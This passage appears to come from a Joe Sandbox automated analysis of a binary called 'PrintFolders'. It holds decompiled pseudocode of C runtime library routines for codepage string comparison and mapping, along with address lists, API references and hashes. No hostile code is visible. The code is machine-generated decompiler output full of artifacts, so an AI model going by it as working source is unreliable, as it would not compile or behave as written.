						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E1000A43C(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E1000873B(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E1000F460(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E1000A43C(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E1000A43C(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E1000873B(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E1000F460(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E1000A43C(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E100081B8(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E1000B760(_t103);
													}
												}
											}
										}
									}
								}
								E1000B760(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E100031FF(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x1000b497
0x1000b49e
0x1000b4a6
0x1000b4a9
0x1000b4af
0x1000b4b2
0x1000b4b5
0x1000b4b9
0x1000b4bc
0x1000b4c1
0x1000b4d6
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b4c3
0x1000b4cb
0x1000b4cd
0x1000b4dc
0x1000b4dc
0x1000b4e1
0x1000b4f3
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b4e3
0x1000b4ec
0x1000b4f9
0x1000b4f9
0x1000b4fe
0x1000b505
0x1000b508
0x1000b508
0x1000b50d
0x1000b519
0x1000b6ff
0x1000b6ff
0x00000000
0x1000b51f
0x1000b522
0x1000b5ab
0x1000b5ad
0x1000b528
0x1000b52b
0x1000b570
0x1000b570
0x00000000
0x1000b52d
0x1000b53a
0x00000000
0x1000b540
0x1000b542
0x1000b57a
0x00000000
0x1000b57c
0x1000b580
0x1000b586
0x1000b589
0x1000b58b
0x1000b58e
0x1000b58e
0x1000b593
0x00000000
0x00000000
0x1000b595
0x1000b599
0x1000b5a3
0x1000b5a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b599
0x1000b58e
0x1000b589
0x00000000
0x1000b580
0x1000b544
0x1000b548
0x1000b54e
0x1000b551
0x1000b553
0x1000b553
0x1000b558
0x00000000
0x00000000
0x1000b55a
0x1000b55e
0x1000b568
0x1000b56e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b55e
0x1000b553
0x1000b551
0x00000000
0x1000b572
0x1000b572
0x1000b572
0x1000b542
0x1000b53a
0x1000b52b
0x1000b522
0x1000b5b3
0x1000b5b3
0x1000b5b3
0x1000b5c0
0x1000b5c5
0x1000b5c8
0x1000b5cd
0x1000b706
0x1000b706
0x1000b5d3
0x1000b5d6
0x1000b5db
0x1000b5dd
0x1000b5df
0x1000b622
0x1000b624
0x00000000
0x1000b5e1
0x1000b5e6
0x1000b603
0x1000b608
0x1000b60e
0x00000000
0x1000b614
0x1000b614
0x00000000
0x1000b614
0x1000b5e8
0x1000b5e8
0x1000b5ed
0x1000b5ef
0x1000b5f4
0x1000b6f1
0x1000b6f1
0x1000b5fa
0x1000b5fa
0x1000b61a
0x1000b61a
0x1000b61d
0x1000b627
0x1000b629
0x00000000
0x1000b62f
0x1000b637
0x1000b63d
0x1000b642
0x1000b647
0x00000000
0x1000b64d
0x1000b656
0x1000b65b
0x1000b65e
0x1000b663
0x00000000
0x1000b669
0x1000b66c
0x1000b671
0x1000b673
0x1000b675
0x1000b6a9
0x00000000
0x1000b677
0x1000b67c
0x1000b697
0x1000b69c
0x00000000
0x1000b69e
0x1000b69e
0x00000000
0x1000b69e
0x1000b67e
0x1000b67e
0x1000b683
0x1000b687
0x1000b6e5
0x1000b6e5
0x1000b689
0x1000b689
0x1000b6a4
0x1000b6a4
0x1000b6ab
0x1000b6ad
0x00000000
0x1000b6c8
0x1000b6c8
0x1000b6e1
0x1000b6e1
0x1000b6ad
0x1000b687
0x1000b67c
0x1000b6e9
0x1000b6ee
0x1000b663
0x1000b647
0x1000b629
0x1000b5f4
0x1000b5e6
0x1000b6f5
0x1000b6fb
0x1000b6fb
0x1000b5cd
0x1000b50d
0x1000b4e1
0x1000b708
0x1000b719

APIs

GetCPInfo.KERNEL32(00000000,00000001,0000000C,7FFFFFFF,?,?,1000B74B,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 1000B532
__alloca_probe_16.LIBCMT ref: 1000B5E8
__alloca_probe_16.LIBCMT ref: 1000B67E
__freea.LIBCMT ref: 1000B6E9
__freea.LIBCMT ref: 1000B6F5

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: c6390f5830a5bd64e0d7d9921fe9131eca71760e160ba7ebcfd4c686c01d4e7a
Instruction ID: 51b2610d37baa8f47a16c6f8ed064628e0d76a618a69041087d5fbf597a7fe1f
Opcode Fuzzy Hash: c6390f5830a5bd64e0d7d9921fe9131eca71760e160ba7ebcfd4c686c01d4e7a
Instruction Fuzzy Hash: 7481B072E00A1A9BFF10DE658C81AEE7BF9DF493D4F150159E804B7249D636DD40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0042A50A Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0042A50A(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0x43d054; // 0x7bd02ead
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E00419C8D(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E00419C8D(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E0041FE48(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E0041ED2F(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E0040F580(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E0041FE48(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E0041FE48(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E0041ED2F(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E0040F580(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E0041FE48(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E0041E671(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E0040EBA1(_t103);
													}
												}
											}
										}
									}
								}
								E0040EBA1(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E0040EBBF(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x0042a512
0x0042a519
0x0042a521
0x0042a524
0x0042a52a
0x0042a52d
0x0042a530
0x0042a534
0x0042a537
0x0042a53c
0x0042a551
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a53e
0x0042a546
0x0042a548
0x0042a557
0x0042a557
0x0042a55c
0x0042a56e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a55e
0x0042a567
0x0042a574
0x0042a574
0x0042a579
0x0042a580
0x0042a583
0x0042a583
0x0042a588
0x0042a594
0x0042a77a
0x0042a77a
0x00000000
0x0042a59a
0x0042a59d
0x0042a626
0x0042a628
0x0042a5a3
0x0042a5a6
0x0042a5eb
0x0042a5eb
0x00000000
0x0042a5a8
0x0042a5b5
0x00000000
0x0042a5bb
0x0042a5bd
0x0042a5f5
0x00000000
0x0042a5f7
0x0042a5fb
0x0042a601
0x0042a604
0x0042a606
0x0042a609
0x0042a609
0x0042a60e
0x00000000
0x00000000
0x0042a610
0x0042a614
0x0042a61e
0x0042a624
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a614
0x0042a609
0x0042a604
0x00000000
0x0042a5fb
0x0042a5bf
0x0042a5c3
0x0042a5c9
0x0042a5cc
0x0042a5ce
0x0042a5ce
0x0042a5d3
0x00000000
0x00000000
0x0042a5d5
0x0042a5d9
0x0042a5e3
0x0042a5e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a5d9
0x0042a5ce
0x0042a5cc
0x00000000
0x0042a5ed
0x0042a5ed
0x0042a5ed
0x0042a5bd
0x0042a5b5
0x0042a5a6
0x0042a59d
0x0042a62e
0x0042a62e
0x0042a62e
0x0042a63b
0x0042a640
0x0042a643
0x0042a648
0x0042a781
0x0042a781
0x0042a64e
0x0042a651
0x0042a656
0x0042a658
0x0042a65a
0x0042a69d
0x0042a69f
0x00000000
0x0042a65c
0x0042a661
0x0042a67e
0x0042a683
0x0042a689
0x00000000
0x0042a68f
0x0042a68f
0x00000000
0x0042a68f
0x0042a663
0x0042a663
0x0042a668
0x0042a66a
0x0042a66f
0x0042a76c
0x0042a76c
0x0042a675
0x0042a675
0x0042a695
0x0042a695
0x0042a698
0x0042a6a2
0x0042a6a4
0x00000000
0x0042a6aa
0x0042a6b2
0x0042a6b8
0x0042a6bd
0x0042a6c2
0x00000000
0x0042a6c8
0x0042a6d1
0x0042a6d6
0x0042a6d9
0x0042a6de
0x00000000
0x0042a6e4
0x0042a6e7
0x0042a6ec
0x0042a6ee
0x0042a6f0
0x0042a724
0x00000000
0x0042a6f2
0x0042a6f7
0x0042a712
0x0042a717
0x00000000
0x0042a719
0x0042a719
0x00000000
0x0042a719
0x0042a6f9
0x0042a6f9
0x0042a6fe
0x0042a702
0x0042a760
0x0042a760
0x0042a704
0x0042a704
0x0042a71f
0x0042a71f
0x0042a726
0x0042a728
0x00000000
0x0042a743
0x0042a743
0x0042a75c
0x0042a75c
0x0042a728
0x0042a702
0x0042a6f7
0x0042a764
0x0042a769
0x0042a6de
0x0042a6c2
0x0042a6a4
0x0042a66f
0x0042a661
0x0042a770
0x0042a776
0x0042a776
0x0042a648
0x0042a588
0x0042a55c
0x0042a783
0x0042a794

APIs

GetCPInfo.KERNEL32(00000000,00000001,7BD02EAD,7FFFFFFF,?,?,0042A7C6,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0042A5AD
__alloca_probe_16.LIBCMT ref: 0042A663
__alloca_probe_16.LIBCMT ref: 0042A6F9
__freea.LIBCMT ref: 0042A764
__freea.LIBCMT ref: 0042A770

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: a5fe50a03750e12b804546607bf942e621f4ed7c490ae8aaad7ccc39bb9a9842
Instruction ID: f4f69ad519bf12574fe1d3cc16ac7f29689b845bc3e354e2090f1d74cfa97f91
Opcode Fuzzy Hash: a5fe50a03750e12b804546607bf942e621f4ed7c490ae8aaad7ccc39bb9a9842
Instruction Fuzzy Hash: A981B372E002256BDF209E55AD41AEF7BB59F49714F98005BEC40A7241D73DCC61CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 1000D0F4 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E1000D0F4(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x10017004; // 0x79eab102
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E1000D4D1(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E1000A43C(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E100031FF(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E1000B760(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E1000A43C(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E1000835F(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E1000835F(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E1000B760(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E1000A4B8();
									if(_t95 != 0) {
										E1000B760(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E1000873B(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E1000F460(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E1000835F(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E1000873B(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E1000F460(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x1000d0f9
0x1000d0fa
0x1000d0fb
0x1000d102
0x1000d107
0x1000d10d
0x1000d113
0x1000d119
0x1000d11c
0x1000d11c
0x1000d11f
0x1000d121
0x1000d121
0x1000d11f
0x1000d123
0x1000d128
0x1000d12f
0x1000d132
0x1000d132
0x1000d153
0x1000d155
0x1000d158
0x1000d15d
0x1000d2bb
0x1000d2be
0x1000d2bf
0x1000d2c0
0x1000d2cc
0x1000d163
0x1000d166
0x1000d16b
0x1000d16d
0x1000d16f
0x1000d1a6
0x1000d1a8
0x1000d1aa
0x1000d2b0
0x1000d2b0
0x1000d2b2
0x1000d2b3
0x1000d2b9
0x00000000
0x1000d2b9
0x1000d1b9
0x1000d1be
0x1000d1c3
0x00000000
0x00000000
0x1000d1c9
0x1000d1e0
0x1000d1e4
0x00000000
0x00000000
0x1000d1ea
0x1000d1f2
0x1000d22f
0x1000d234
0x1000d236
0x1000d238
0x1000d269
0x1000d26b
0x1000d26d
0x1000d2a9
0x1000d2aa
0x00000000
0x1000d28a
0x1000d28c
0x1000d28d
0x1000d291
0x1000d2cd
0x1000d2d0
0x1000d293
0x1000d293
0x1000d294
0x1000d294
0x1000d295
0x1000d296
0x1000d297
0x1000d298
0x1000d2a0
0x1000d2a7
0x1000d2d6
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d2a7
0x1000d26d
0x1000d23c
0x1000d257
0x1000d25c
0x00000000
0x00000000
0x1000d25e
0x1000d264
0x1000d264
0x00000000
0x1000d264
0x1000d23e
0x1000d243
0x1000d247
0x00000000
0x00000000
0x1000d249
0x00000000
0x1000d249
0x1000d1f4
0x1000d1f9
0x00000000
0x00000000
0x1000d201
0x00000000
0x00000000
0x1000d21d
0x1000d221
0x00000000
0x00000000
0x00000000
0x1000d227
0x1000d176
0x1000d191
0x1000d196
0x1000d1a1
0x1000d1a1
0x00000000
0x1000d1a1
0x1000d198
0x1000d19e
0x1000d19e
0x00000000
0x1000d19e
0x1000d178
0x1000d17d
0x1000d181
0x00000000
0x00000000
0x1000d183
0x00000000
0x1000d183

APIs

__alloca_probe_16.LIBCMT ref: 1000D178
__alloca_probe_16.LIBCMT ref: 1000D23E
__freea.LIBCMT ref: 1000D2AA

Part of subcall function 1000873B: RtlAllocateHeap.NTDLL(00000000,?,?,?,10003243,?,?,100024B8,0007A120), ref: 1000876D

__freea.LIBCMT ref: 1000D2B3
__freea.LIBCMT ref: 1000D2D6

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 146f262ff555a53674fd139b17de7a2300d41466104e78fb213c224316c85ad6
Instruction ID: 8e48ba519724a98946e6f1a20e563b472711a73b32590d39ac94bb068a9bb579
Opcode Fuzzy Hash: 146f262ff555a53674fd139b17de7a2300d41466104e78fb213c224316c85ad6
Instruction Fuzzy Hash: DC51B172600216ABFB11EE54CC81EAF37A9EF957E0F12012AFD04A7148EB70ED5196B1

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA71 Relevance: 7.7, APIs: 5, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E0041BA71(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				intOrPtr _t292;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				void* _t366;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t371;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				char* _t398;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t363 = E0041ED2F(0x6a6);
				_t250 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t428 = _t363 + 4;
					_t444 = _a4;
					 *_t428 = 0;
					_t251 = _t444 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x431670);
